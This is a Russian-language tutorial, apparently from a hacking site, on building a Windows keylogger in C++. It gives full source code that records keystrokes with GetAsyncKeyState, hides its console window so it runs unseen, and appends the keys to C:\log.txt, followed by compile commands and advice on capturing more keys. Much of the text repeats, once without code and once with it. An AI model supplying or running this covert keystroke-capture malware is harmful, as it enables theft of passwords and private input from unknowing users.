SKWOSY
HACKER //
Будем писать программу в функции которой будет входить чтение вводимых клавиш клавиатуры и запись их в текстовый файл.
Для работы нам понадобится текстовый файл и компилятор C++
Компилятор на ваш вкус, можете использовать VC++ или С++ Builder.
Хотя их намного больше. Лично мне удобнее использовать IDE Clion от JetBrains, и компилятор MinGW.
Для компиляции в VC++.
Для компиляции в С++ Builder
Создадим текстовый файл(keylogger.txt)
В нём пишем:
Дальше сохраняем это всё и меняем разрешение файла на cpp(keylogger.cpp)
Компилировать будем на С++ Builder.
Открываем "Командную строку"(Для тех кто не знает win+R пишем cmd и нажимаем Enter)
Пишем bcc32.exe C:\\путь\keylogger.cpp
У вас получится три файла keylogger.obj keylogger.tds и наш исполняемый файл keylogger.exe(два других можете удалить).
Не большие объяснения что же мы написали:
Использовали во первых GetAsyncKeyState
определяет, является ли клавиша отпущенной или нажатой во время вызова функции и была ли клавиша нажата после предыдущего вызова GetAsyncKeyState.
Для работы GetAsyncKeyState подключили #include <windows.h>
Здесь мы :
Открываем консоль и вводим значение cout << key << endl; , после чего записываем в файл.
Что бы консоль не было видно использовали:
Основное действие происходит уже не посредственно в:
Где C:\\log.txt куда сохраняется лог
Естественно не все клавиши выводятся,для этого нужно дописывать к примеру:
Для работы нам понадобится текстовый файл и компилятор C++
Компилятор на ваш вкус, можете использовать VC++ или С++ Builder.
Хотя их намного больше. Лично мне удобнее использовать IDE Clion от JetBrains, и компилятор MinGW.
Для компиляции в VC++.
Код:
cl -GL C:\\путь\файл.cpp
Для компиляции в С++ Builder
Код:
bcc32.exe C:\\путь\файл.cpp
Создадим текстовый файл(keylogger.txt)
В нём пишем:
Код:
#include <iostream>
#include <windows.h>
#include <winuser.h>
using namespace std;
int S (int key, char *files);
void Hide();
int S (int key, char *files)
{
if ( (key == 1) || (key == 2) )
return 0;
FILE *Save;
Save = fopen(files, "a+");
cout << key << endl;
fprintf(Save, "%s", &key);
fclose (Save);
return 0;
}
void Hide()
{
HWND Hide;
AllocConsole();
Hide = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Hide,0);
}
int main()
{
Hide();
char q;
while (1)
{
for(q = 8; q <= 190; q++)
{
if (GetAsyncKeyState(q) == -32767)
S (q,"C:\\log.txt");
}
}
system ("PAUSE");
return 0;
}
Дальше сохраняем это всё и меняем разрешение файла на cpp(keylogger.cpp)
Компилировать будем на С++ Builder.
Открываем "Командную строку"(Для тех кто не знает win+R пишем cmd и нажимаем Enter)
Пишем bcc32.exe C:\\путь\keylogger.cpp
У вас получится три файла keylogger.obj keylogger.tds и наш исполняемый файл keylogger.exe(два других можете удалить).
Не большие объяснения что же мы написали:
Использовали во первых GetAsyncKeyState
определяет, является ли клавиша отпущенной или нажатой во время вызова функции и была ли клавиша нажата после предыдущего вызова GetAsyncKeyState.
Для работы GetAsyncKeyState подключили #include <windows.h>
Здесь мы :
Код:
nt S (int key, char *files)
{
if ( (key == 1) || (key == 2) )
return 0;
FILE *Save;
Save = fopen(files, "a+");
cout << key << endl;
fprintf(Save, "%s", &key);
fclose (Save);
return 0;
}
Открываем консоль и вводим значение cout << key << endl; , после чего записываем в файл.
Что бы консоль не было видно использовали:
Код:
{
HWND Hide;
AllocConsole();
Hide = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Hide,0);
}
Основное действие происходит уже не посредственно в:
Код:
int main()
{
Hide();
char q;
while (1)
{
for(q = 8; q <= 190; q++)
{
if (GetAsyncKeyState(q) == -32767)
S (q,"C:\\log.txt");
}
}
system ("PAUSE");
return 0;
}
Где C:\\log.txt куда сохраняется лог
Естественно не все клавиши выводятся,для этого нужно дописывать к примеру:
Код:
if (key == VK_TAB)
fprintf(Save, "%s", "[TAB]");